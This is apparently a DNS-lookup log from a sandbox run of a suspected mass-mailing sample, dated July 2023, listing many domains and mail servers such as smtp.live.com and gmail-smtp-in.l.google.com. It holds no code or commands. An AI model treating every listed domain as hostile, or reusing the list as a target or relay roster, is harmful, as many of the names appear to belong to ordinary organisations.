                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.047987938 CEST192.168.2.48.8.8.80xffbeStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.076392889 CEST192.168.2.48.8.8.80xdff7Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.341480970 CEST192.168.2.48.8.8.80x48a7Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.342479944 CEST192.168.2.48.8.8.80x1166Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.987795115 CEST192.168.2.48.8.8.80x815eStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.207634926 CEST192.168.2.48.8.8.80x7bfaStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.213766098 CEST192.168.2.48.8.8.80x3242Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.643690109 CEST192.168.2.48.8.8.80x65ccStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.787560940 CEST192.168.2.48.8.8.80xdedaStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.816050053 CEST192.168.2.48.8.8.80x106fStandard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.203526974 CEST192.168.2.48.8.8.80xa9a3Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.247313976 CEST192.168.2.48.8.8.80x7bfaStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.413368940 CEST192.168.2.48.8.8.80x7529Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.442490101 CEST192.168.2.48.8.8.80x74a5Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.583152056 CEST192.168.2.48.8.8.80x51b7Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.824794054 CEST192.168.2.48.8.8.80x2d5dStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.080807924 CEST192.168.2.48.8.8.80x9616Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.173918009 CEST192.168.2.48.8.8.80x278eStandard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.453480005 CEST192.168.2.48.8.8.80x36c6Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.623389959 CEST192.168.2.48.8.8.80x6e3dStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.261250973 CEST192.168.2.48.8.8.80xb257Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.263091087 CEST192.168.2.48.8.8.80x3deStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.288094997 CEST192.168.2.48.8.8.80x9b99Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.616100073 CEST192.168.2.48.8.8.80xf3c6Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.350075960 CEST192.168.2.48.8.8.80x620fStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.411325932 CEST192.168.2.48.8.8.80x8ab7Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:02.553124905 CEST192.168.2.48.8.8.80xc053Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:02.555005074 CEST192.168.2.48.8.8.80x6170Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:03.049396992 CEST192.168.2.48.8.8.80xff9aStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:03.053062916 CEST192.168.2.48.8.8.80xf3aStandard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:04.236814976 CEST192.168.2.48.8.8.80x9ae8Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:04.240833998 CEST192.168.2.48.8.8.80x7631Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:04.522483110 CEST192.168.2.48.8.8.80x4f88Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:05.676660061 CEST192.168.2.48.8.8.80x1151Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:06.425091028 CEST192.168.2.48.8.8.80x5dabStandard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.340807915 CEST192.168.2.48.8.8.80x3359Standard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.468295097 CEST192.168.2.48.8.8.80x93caStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.825251102 CEST192.168.2.48.8.8.80x86feStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:13.297137022 CEST192.168.2.48.8.8.80x1754Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:13.807925940 CEST192.168.2.48.8.8.80xd6d3Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:15.499171019 CEST192.168.2.48.8.8.80x6839Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:16.461426973 CEST192.168.2.48.8.8.80x7481Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:16.913863897 CEST192.168.2.48.8.8.80x2924Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:17.268903971 CEST192.168.2.48.8.8.80x27c7Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:19.121299982 CEST192.168.2.48.8.8.80x950cStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:20.417867899 CEST192.168.2.48.8.8.80x88f9Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:20.816570997 CEST192.168.2.48.8.8.80xa918Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:21.991668940 CEST192.168.2.48.8.8.80x6b03Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.056920052 CEST192.168.2.48.8.8.80xb335Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.067881107 CEST192.168.2.48.8.8.80x6222Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.738190889 CEST192.168.2.48.8.8.80x3142Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:24.631414890 CEST192.168.2.48.8.8.80xefbaStandard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:24.632797003 CEST192.168.2.48.8.8.80xb10aStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:25.345550060 CEST192.168.2.48.8.8.80x2f84Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:25.764590025 CEST192.168.2.48.8.8.80x4af7Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:26.209846973 CEST192.168.2.48.8.8.80xab63Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:26.355307102 CEST192.168.2.48.8.8.80xcf8bStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:26.625957966 CEST192.168.2.48.8.8.80xa025Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:27.573582888 CEST192.168.2.48.8.8.80x746fStandard query (0)mail.protonmail.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:28.001698017 CEST192.168.2.48.8.8.80x5ea7Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:28.702837944 CEST192.168.2.48.8.8.80xe23aStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:29.254046917 CEST192.168.2.48.8.8.80xc026Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:30.166142941 CEST192.168.2.48.8.8.80xe503Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:30.520351887 CEST192.168.2.48.8.8.80x4189Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:30.619569063 CEST192.168.2.48.8.8.80x6bd1Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:31.633816004 CEST192.168.2.48.8.8.80xc3dStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:32.161673069 CEST192.168.2.48.8.8.80x7ecbStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:32.655740023 CEST192.168.2.48.8.8.80x1b53Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.421029091 CEST192.168.2.48.8.8.80x3b17Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.425884962 CEST192.168.2.48.8.8.80xf48Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.392287970 CEST192.168.2.48.8.8.80xa1dStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:36.001310110 CEST192.168.2.48.8.8.80xce69Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.096683025 CEST192.168.2.48.8.8.80x6e4Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.589617968 CEST192.168.2.48.8.8.80x4485Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.799716949 CEST192.168.2.48.8.8.80x82f6Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.799808979 CEST192.168.2.48.8.8.80x3ad3Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.799894094 CEST192.168.2.48.8.8.80x542dStandard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.801403999 CEST192.168.2.48.8.8.80x901fStandard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.807667017 CEST192.168.2.48.8.8.80xa006Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.816042900 CEST192.168.2.48.8.8.80xa32Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.817663908 CEST192.168.2.48.8.8.80xc9c9Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.821293116 CEST192.168.2.48.8.8.80xe51eStandard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.823626041 CEST192.168.2.48.8.8.80xc8b2Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.825562954 CEST192.168.2.48.8.8.80x4e4fStandard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.895569086 CEST192.168.2.48.8.8.80x6796Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.912221909 CEST192.168.2.48.8.8.80xb6adStandard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.962601900 CEST192.168.2.48.8.8.80x4e7dStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.962793112 CEST192.168.2.48.8.8.80xe4a1Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.962872028 CEST192.168.2.48.8.8.80x900aStandard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.964159012 CEST192.168.2.48.8.8.80xcd09Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:38.964752913 CEST192.168.2.48.8.8.80xff3Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.009685040 CEST192.168.2.48.8.8.80x39ffStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.036533117 CEST192.168.2.48.8.8.80xb5afStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.068521023 CEST192.168.2.48.8.8.80x1496Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.087230921 CEST192.168.2.48.8.8.80xe46aStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.091895103 CEST192.168.2.48.8.8.80x3729Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.091895103 CEST192.168.2.48.8.8.80x50fcStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.091895103 CEST192.168.2.48.8.8.80x7d1dStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.091895103 CEST192.168.2.48.8.8.80xd3b6Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.102667093 CEST192.168.2.48.8.8.80x7c27Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.102880001 CEST192.168.2.48.8.8.80x6a40Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.102915049 CEST192.168.2.48.8.8.80xc0bStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.106540918 CEST192.168.2.48.8.8.80x93f0Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.107263088 CEST192.168.2.48.8.8.80x42c2Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.129573107 CEST192.168.2.48.8.8.80x95adStandard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.135775089 CEST192.168.2.48.8.8.80xd738Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.142736912 CEST192.168.2.48.8.8.80x64f7Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.143805027 CEST192.168.2.48.8.8.80xbaaaStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.143872023 CEST192.168.2.48.8.8.80x1b12Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.145890951 CEST192.168.2.48.8.8.80x144fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.154552937 CEST192.168.2.48.8.8.80xb66cStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.169315100 CEST192.168.2.48.8.8.80x4c32Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.172945023 CEST192.168.2.48.8.8.80xb411Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.212120056 CEST192.168.2.48.8.8.80x7af9Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.235335112 CEST192.168.2.48.8.8.80x5291Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.254722118 CEST192.168.2.48.8.8.80xc355Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.279061079 CEST192.168.2.48.8.8.80x9f9fStandard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.292757034 CEST192.168.2.48.8.8.80x5ac5Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.303793907 CEST192.168.2.48.8.8.80x8f63Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.336206913 CEST192.168.2.48.8.8.80xee10Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.386773109 CEST192.168.2.48.8.8.80xa9a5Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.403631926 CEST192.168.2.48.8.8.80x8211Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.420890093 CEST192.168.2.48.8.8.80xc9eStandard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.426315069 CEST192.168.2.48.8.8.80xd227Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.450186014 CEST192.168.2.48.8.8.80x1586Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.455250025 CEST192.168.2.48.8.8.80x870eStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.464426994 CEST192.168.2.48.8.8.80x6ddStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.493113995 CEST192.168.2.48.8.8.80xe987Standard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.514172077 CEST192.168.2.48.8.8.80xbd2cStandard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.528326988 CEST192.168.2.48.8.8.80xa0acStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.532872915 CEST192.168.2.48.8.8.80x8342Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.536930084 CEST192.168.2.48.8.8.80xf89Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.570462942 CEST192.168.2.48.8.8.80x8caaStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.570784092 CEST192.168.2.48.8.8.80x1d3dStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.572226048 CEST192.168.2.48.8.8.80xda5cStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.575872898 CEST192.168.2.48.8.8.80x7398Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.578617096 CEST192.168.2.48.8.8.80xff7eStandard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.581178904 CEST192.168.2.48.8.8.80xfe39Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.582421064 CEST192.168.2.48.8.8.80xe457Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.606543064 CEST192.168.2.48.8.8.80x6678Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.607366085 CEST192.168.2.48.8.8.80x4cabStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.624305964 CEST192.168.2.48.8.8.80x390aStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.687835932 CEST192.168.2.48.8.8.80xa9bbStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.689289093 CEST192.168.2.48.8.8.80x7be3Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.699091911 CEST192.168.2.48.8.8.80x4512Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.709820986 CEST192.168.2.48.8.8.80xb8eeStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.716737032 CEST192.168.2.48.8.8.80x6e23Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.733033895 CEST192.168.2.48.8.8.80xe90eStandard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.736419916 CEST192.168.2.48.8.8.80x1666Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.742557049 CEST192.168.2.48.8.8.80x4f2cStandard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.742770910 CEST192.168.2.48.8.8.80x2188Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.751199961 CEST192.168.2.48.8.8.80x12afStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.762032986 CEST192.168.2.48.8.8.80xc607Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.768295050 CEST192.168.2.48.8.8.80xd132Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.768506050 CEST192.168.2.48.8.8.80x1dcStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.773485899 CEST192.168.2.48.8.8.80x9439Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.793276072 CEST192.168.2.48.8.8.80xd8fbStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.810177088 CEST192.168.2.48.8.8.80x2f70Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.819298029 CEST192.168.2.48.8.8.80x102fStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.875973940 CEST192.168.2.48.8.8.80x4509Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.876846075 CEST192.168.2.48.8.8.80xce55Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.889199972 CEST192.168.2.48.8.8.80xbae1Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.895347118 CEST192.168.2.48.8.8.80x6bStandard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.898633003 CEST192.168.2.48.8.8.80xf55dStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.913229942 CEST192.168.2.48.8.8.80x10a2Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.948007107 CEST192.168.2.48.8.8.80x30c1Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.968291998 CEST192.168.2.48.8.8.80x196bStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.975496054 CEST192.168.2.48.8.8.80xdc06Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.975496054 CEST192.168.2.48.8.8.80x441cStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.979546070 CEST192.168.2.48.8.8.80xf863Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:39.981282949 CEST192.168.2.48.8.8.80x4bc0Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
